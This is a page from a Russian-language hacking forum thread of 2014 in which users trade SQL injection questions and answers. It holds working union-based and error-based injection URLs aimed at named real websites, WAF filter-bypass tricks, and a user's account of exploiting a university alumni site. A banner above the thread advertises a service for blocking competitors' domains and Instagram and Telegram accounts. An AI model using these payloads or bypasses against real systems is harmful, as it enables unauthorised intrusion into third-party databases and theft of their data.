УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2327 из 2438

2327

Опции темы

Поиск в этой теме

Опции просмотра

#23261

05.02.2014, 18:26

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от WallHack

WallHack said:
Фильтруется from
Такой запрос проходит -1%27+/*!union*/+SeLect+1/*!,*/version%28%29/*!,*/3/*!,*/4+--+
Такой не проходит -1%27+/*!union*/+SeLect+1/*!,*/password/*!,*/3/*!,*/4+/*!FrOm*/+--+
Как можно обойти фильтр ?

1. FRFROMOM

2. POST

2. From находится в связке с union, select, пробелом и т.д.

#23262

05.02.2014, 22:17

Unknown

Guest

Сообщений: n/a

Провел на форуме:
77731

Репутация: 33

Цитата:

Сообщение от YaBtr

YaBtr said:
Уязвимый параметр
year
:
5.1.70-log
Далее на пути стоит sweb, обходите путем изменения регистра.

Тьфу, ёпрст, я уж думал это вопрос Ну а раз нет ссылки погуглил, нашел и крутанул сайт

Код:

Code:
Красноярский государственный медицинский университет - Клуб выпускников

...бывает)))

П.С. Извиняюсь за офф.топ

#23263

06.02.2014, 00:26

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от GhostW

GhostW said:
Тьфу, ёпрст, я уж думал это вопрос
Ну а раз нет ссылки погуглил, нашел и крутанул сайт

Код:

Code:
Красноярский государственный медицинский университет - Клуб выпускников

...бывает)))
П.С. Извиняюсь за офф.топ

а я как раз думал, кто его похекал... но теперь и логи есть и IP и признание хацкера на форуме, пора подшивать дело!))) начальство и прокуратура будет довольна

Цитата:

Сообщение от GhostW

GhostW said:
П.С. Извиняюсь за офф.топ

да, не... молодец, все норм)))

#23264

06.02.2014, 02:48

Unknown

Guest

Сообщений: n/a

Провел на форуме:
77731

Репутация: 33

Цитата:

Сообщение от winstrool

winstrool said:
а я как раз думал, кто его похекал... но теперь и логи есть и IP и признание хацкера на форуме, пора подшивать дело!))) начальство и прокуратура будет довольна
да, не... молодец, все норм)))

Админам на почту отписал так что не надо ля-ля...

#23265

06.02.2014, 18:01

Unknowhacker

Guest

Сообщений: n/a

Провел на форуме:
94006

Репутация: 24

http://www.sailorjob.com.ua/show_firm/?id=482+order+by+1+--+

#23266

06.02.2014, 18:06

kingbeef

Новичок

Регистрация: 08.04.2010

Сообщений: 1

Провел на форуме:
70640

Репутация: 0

Цитата:

Сообщение от Unknowhacker

Unknowhacker said:
http://www.sailorjob.com.ua/show_firm/?id=482+order+by+1+--+

Что с этим сделать надо?

Если раскрутить, то вот.

http://www.sailorjob.com.ua/show_firm/?id=482%27and(select+1+from(select+count(*),concat ((select+table_name+from+information_schema.tables +limit+0,1),floor(rand(0)*2))x+from+information_sc hema.tables+group+by+x)a)--+g

#23267

07.02.2014, 16:55

Unknown

Guest

Сообщений: n/a

Провел на форуме:
12774

Репутация: 12

Почему не выводит имя таблиц(ы)?

Код:

Code:
www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+

#23268

07.02.2014, 17:06

kingbeef

Новичок

Регистрация: 08.04.2010

Сообщений: 1

Провел на форуме:
70640

Репутация: 0

Цитата:

Сообщение от Shade

Shade said:
Почему не выводит имя таблиц(ы)?

Код:

Code:
www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+

http://www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,(select(@x)from(select(@x:=0x00 ),(select(null)from(information_schema.columns)whe re(table_schema!=0x696e666f726d6174696f6e5f7363686 56d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_s chema,0x2e,table_name,0x3a,column_name))))x),3,4,5 ,6,7,8,9,10,11+--+

#23269

07.02.2014, 17:11

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от Shade

Shade said:
Почему не выводит имя таблиц(ы)?

Код:

Code:
www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+

unhex(hex(table_name))

#23270

07.02.2014, 19:38

Unknowhacker

Guest

Сообщений: n/a

Провел на форуме:
94006

Репутация: 24

Код:

Code:
http://www.muzgid.ua/ru/news/info-42.html

- уязвимое поле поиска.

Страница 2327 из 2438

2327

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход